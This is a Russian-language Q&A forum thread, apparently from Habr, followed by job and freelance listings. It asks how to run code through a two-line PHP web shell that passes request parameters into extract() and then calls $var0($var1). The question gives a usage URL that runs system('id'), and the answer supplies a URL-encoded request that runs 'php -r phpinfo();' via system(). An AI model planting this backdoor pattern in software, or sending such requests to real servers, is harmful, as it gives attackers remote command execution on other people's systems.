Задать вопрос
@NO_GLITCH
php

Как правильно выполнить eval через extract (PHP)?

Пример
<?php
@extract ($_REQUEST); 
@die ($var0($var1));
?>


Использование
http://example.com/code.php?var0=system&var1=id
Вопрос:
Как запустить выполнение, например phpinfo(); через данный скрипт с использованием eval(); ?
  • Вопрос задан
  • 308 просмотров
Комментировать
Подписаться 1 Оценить Комментировать
Пригласить эксперта
Ответы на вопрос 1
orlov0562
@orlov0562 Куратор тега PHP
I'm cool! 
http://example.com/code.php?var0=system&var1=php+-r+%22phpinfo%28%29%3B%22

надо передать во второй параметр:
php -r"phpinfo();"
предварительно обработав его в urlencode, онлайн можно тут делать: www.url-encode-decode.com

И это сработает, только если на сервере не запрещены методы (system, exec, popen и т.д.) к выполнению
Ответ написан
Комментировать
Комментировать
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации
Похожие вопросы
Вакансии с Хабр Карьеры
PHP разработчик
Ведисофт Екатеринбург
от 25 000 ₽
PHP-разработчик
M-Social Production Брянск
от 70 000 ₽
PHP Developer
YCLIENTS Москва
от 200 000 до 350 000 ₽
Ещё вакансии
Заказы с Хабр Фриланса
Помощь с водпресс
18 апр. 2024, в 21:00
150 руб./за проект
Спарсить ссылки на все товары конкретного продавца в озон
18 апр. 2024, в 20:13
2000 руб./за проект
Устранить проблемы с парсерами и отображением новостей
18 апр. 2024, в 20:08
7000 руб./за проект
Ещё заказы